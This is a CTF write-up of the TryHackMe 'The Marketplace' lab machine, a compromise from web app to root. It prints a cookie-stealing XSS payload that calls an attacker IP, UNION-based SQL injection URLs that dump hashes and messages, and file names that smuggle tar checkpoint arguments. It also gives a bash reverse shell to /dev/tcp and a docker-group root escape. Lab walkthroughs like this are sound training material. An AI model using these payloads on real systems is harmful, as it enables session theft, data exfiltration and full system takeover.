CTF Walkthroughs, TryHackMe

TryHackMe – The Marketplace Walkthrough

January 27, 2022 | by Stefano Lanaro | Leave a comment

Introduction

This was an intermediate Linux machine that involved exploiting a stored cross-site scripting and SQL injection vulnerability to gain initial access and misconfigured sudo rules to escalate privileges to Root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified three open ports, port 22 (SSH), port 80 (HTTP) and port 32768 (Node JS). THe next step will be to start enumerating HTTP.

Enumerating HTTP

When visiting the web server through a browser, the following page appears:

The site allows users to sign up, signing up as “stef”:

Logging into the site with the newly created user:

Navigated back to the home page:

It appears the admin page cannot be accessed as a normal user:

The site seems to be using JWT tokens, when unpacking it, the “admin” parameter appears to be set to false, which is probably why the admin page cannot be accessed:

The site has a way for users to add listings:

When creating one, the site mentions the admins will review them manually:

The box might have a scheduler used to simulate an admin user visiting newly added listings, cross-site scripting could be used to steal the user’s session token. Testing a simple alert payload first:

When visiting the listing, the payload is triggered:

Setting up a Python Simple HTTP Server to receive the admin session token:

Creating a new listing with the following XSS payload, which will send the user’s cookie to the web server as a parameter:

<script>document.write('<img src="http://10.4.36.186?c='+document.cookie+'" />');</script>

The request containing the admin JTW token was received:

It appears the token belongs to the Michael user, which is an administrator:

Manually replacing the current token with Michael’s:

When refreshing the page, the administration panel is now available:

When accessing it, the first flag is found:

When clicking on a user, the URL contains the ‘user’ parameter in it, which means it might be vulnerable to SQL injection:

This can be verified by adding a quote next to the parameter, which will generate a MySQL error:

Exploiting SQL Injection

the number of columns can be checked with an “order by” statement, when ordering by 5 i.e. the fifth column, it errors out, which means it expects four columns:

http://10.10.129.25/admin?user=1 order by 5--

listing tables

http://10.10.129.25/admin?user=123%20union%20SELECT%20group_concat(table_name),2,3,4%20FROM%20information_schema.tables%20WHERE%20table_schema%20=%27marketplace

listing tables

http://10.10.129.25/admin?user=123%20union%20SELECT%20group_concat(table_name),2,3,4%20FROM%20information_schema.tables%20WHERE%20table_schema%20=%27marketplace

enumerating columns

http://10.10.129.25/admin?user=123%20union%20SELECT%20group_concat
(column_name),2,3,4%20from%20information_schema.columns%20where%
20table_schema%20=%20database()%20and%20table_name%20=%27users

enumerating hashes

http://10.10.129.25//admin?user=123%20union%20SELECT%20group_concat(username,0x3a,password),2,3,4%20from%20users

could not crack these unfortunately

listing columns in the messages table

http://10.10.129.25/admin?user=123%20union%20SELECT%20group_concat(column_name),2,3,4%20from%20information_schema.columns%20where%20table_schema%20=%20database()%20and%20table_name%20=%27messages%27

listing messages – a password is found

http://10.10.129.25/admin?user=123%20union%20SELECT%20group_concat(id,0x3a,is_read,0x3a,message_content,0x3a,user_from,0x3a,user_to%20),2,3,4%20from%20messages

this was sent to user id 3 which is jake, logging in as him:

Escalating to Michael User

When executing sudo -l, it appears the current user can execute the /opt/backups/backup.sh as the “Michael” user:

The script is compressing the contents of a folder using a wildcard:

Upon consulting GTFOBins, it appears tar can be exploited when running as sudo. Tar has an argument called –checkpoint, which allows to display a “progress” message every time X number of files have been archived. This can be used in concatenation with the –checkpoint-action, which allows to execute an action, in form of a binary or script, whenever a checkpoint is reached.

Since the wildcard used in the script will execute a given command against all files and folders in the /var/www/html directory, this can be exploited by adding a –checkpoint=1 file (to enable the checkpoint function) and a –checkpointaction=exec=/tmp/stef.sh file (to specify the action to perform) which will be effectively treated as arguments when tar comes across them. More details on the exploit available below:

Executing the following commands to create two files which will be used as arguments for the Tar command line utility (used in the GTFOBins example above):

touch "/var/www/html/--checkpoint-action=exec=bash stef.sh"
touch "/var/www/html/--checkpoint=1"

Creating a BASH script that will run a reverse shell to connect to the local Kali box and making it executable:

#!/bin/bash
bash -i >& /dev/tcp/10.4.36.186/443 0>&1

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup

Running the backup as Michael:

sudo -u michael ./backup.sh

The following steps can be done to obtain an interactive shell:

  • Running “python -c ‘import pty; pty.spawn(“/bin/sh”)’” on the victim host
  • Hitting CTRL+Z to background the process and go back to the local host
  • Running “stty raw -echo” on the local host
  • Hitting “fg + ENTER” to go back to the reverse shell

Escalating to Root

Transferring the LinPEAS enumeration script using the Python Simple HTTP Server and Wget:

Executing the script:

It appears the “michael” user is part of the docker group:

Running the following command to mount a docker container using root permissions:

docker image ls
docker run -it --rm -v /:/mnt apline chroot /mnt bash

This has now granted root-level privileges to the machine.

Conclusion

This was a very cool CTF as it did a great job at emulating a real-life vulnerable application and demonstrating the full chain of exploits that can lead to a full system compromise.